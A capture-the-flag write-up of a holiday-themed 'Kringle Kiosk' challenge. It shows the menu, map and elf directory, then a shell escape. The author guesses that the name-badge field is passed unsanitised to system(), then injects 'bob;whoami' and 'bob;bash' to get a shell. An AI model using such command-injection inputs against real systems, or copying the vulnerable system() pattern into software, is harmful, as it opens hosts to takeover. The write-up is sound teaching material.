Kiosk 2: Kringle Kiosk
Kiosk 2 presents me with a challenge relating to a shell escape. Can I escape the menu and into a bash shell?
This Kiosk was located outside in front of the castle entrance, right next to Shinny Upatree and the Investigate S3 Bucket Objective:
First, I am presented with the initial challenge:
Welcome to our castle, we're so glad to have you with us!
Come and browse the kiosk; though our app's a bit suspicious.
Poke around, try running bash, please try to come discover,
Need our devs who made our app pull/patch to help recover?
Escape the menu by launching /bin/bash
Press enter to continue...
Followed by:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5]
At this point, it is a matter of fuzzing all of the inputs we possibly can here. The menu selector doesn't seem to be exploitable as far as I can tell, since if I enter anything other than a number I am met with an error, and even giving it a number like 2334232534239472398429348723 only selects the '2' menu selection, the Code of Conduct and Terms of Use, which means the menu selection screen most likely only reads the first byte of whatever input is sent to it. Guess a buffer overflow is out of the question. Though I wouldn't expect something like that as the second kiosk challenge.
Exploring the menu shows some fun things:
Enter choice [1 - 5] 1
__ _ --------------
|__)_ _ (_ | NetWars Room |
| \(_)(_)| | |
| * |
--------------
__ __ __ __
_)|_ _)|_ -------
/__| Tracks __)| |Balcony|
1 2 3 4 5 6 7 -------
------- ------------- |
|Speaker|--| Talks Lobby | --------
|Unprep | | | |Santa's |
------- ------ | |Office |
| | -- --
| *| | |
------ | ---
| * |
__ ------
/||_
|| __ __ --------
-------------------------- /| |_ |_ |Wrapping|
| Courtyard | |.__)| | Room |
-------------------------- --------
| | |
------ -------- ------ --- --------
|Dining|--|Kitchen |--|Great | |--|Workshop|
| | -------- | | | | |
| Room |--| * |--| Room | | | |
| | |Entryway| | | | | |
------ -------- ------ | | |
| | * |
---------- --------
|Front Lawn| NOTE: * denotes Santavator
----------
Press [Enter] key to continue...
Cool looking map that I absolutely referenced quite a bit throughout the event.
Enter choice [1 - 5] 3
Name: Floor: Room:
Ribb Bonbowford 1 Dining Room
Noel Boetie 1 Wrapping Room
Ginger Breddie 1 Castle Entry
Minty Candycane 1.5 Workshop
Angel Candysalt 1 Great Room
Tangle Coalbox 1 Speaker UNPreparedness
Bushy Evergreen 2 Talks Lobby
Holly Evergreen 1 Kitchen
Bubble Lightington 1 Courtyard
Jewel Loggins Front Lawn
Sugarplum Mary 1 Courtyard
Pepper Minstix Front Lawn
Bow Ninecandle 2 Talks Lobby
Morcel Nougat 2 Speaker UNPreparedness
Wunorse Openslae R NetWars Room
Sparkle Redberry 1 Castle Entry
Jingle Ringford NJTP
Piney Sappington 1 Castle Entry
Chimney Scissorsticks 2 Talks Lobby
Fitzy Shortstack 1 Kitchen
Alabaster Snowball R NetWars Room
Eve Snowshoes 3 Santa's Balcony
Shinny Upatree Front Lawn
Tinsel Upatree 3 Santa's Office
Press [Enter] key to continue...
A directory of elves and their respective locations. Another thing that came in handy.
The Code of Conduct and Terms of Use was mostly legalese and not interesting enough for this writeup. But the fourth entry, 'Print Name Badge' was interesting...
Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...
If that isn't a hint then I don't know what is. To see what it does, I use the name "Bob." My real name isn't Bob BTW.
Enter your name (Please avoid special characters, they cause some weird errors)...bob
_____
< bob >
-----
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
Press [Enter] key to continue...
It uses cowsay! Or...reindeersay? Either way, that's a separate binary. Most likely this menu performs something like:
char reindeer[21] = "/usr/bin/reindeersay ";
strcat(reindeer, argv[1]);
system(reindeer);
And so, by injecting something like bob; whoami
We get:
Enter your name (Please avoid special characters, they cause some weird errors)...bob;whoami
_____
< bob >
-----
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
*shinny*
Press [Enter] key to continue...
Note the shinny! It executed whoami!
So therefore...
Enter your name (Please avoid special characters, they cause some weird errors)...bob;bash
_____
< bob >
-----
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
___ _
/ __| _ _ __ __ ___ ___ ___ | |
\__ \ | +| | / _| / _| / -_) (_-< (_-< |_|
|___/ \_,_| \__|_ \__|_ \___| /__/_ /__/_ _(_)_
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ |
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
Type 'exit' to return to the menu.
Escaped!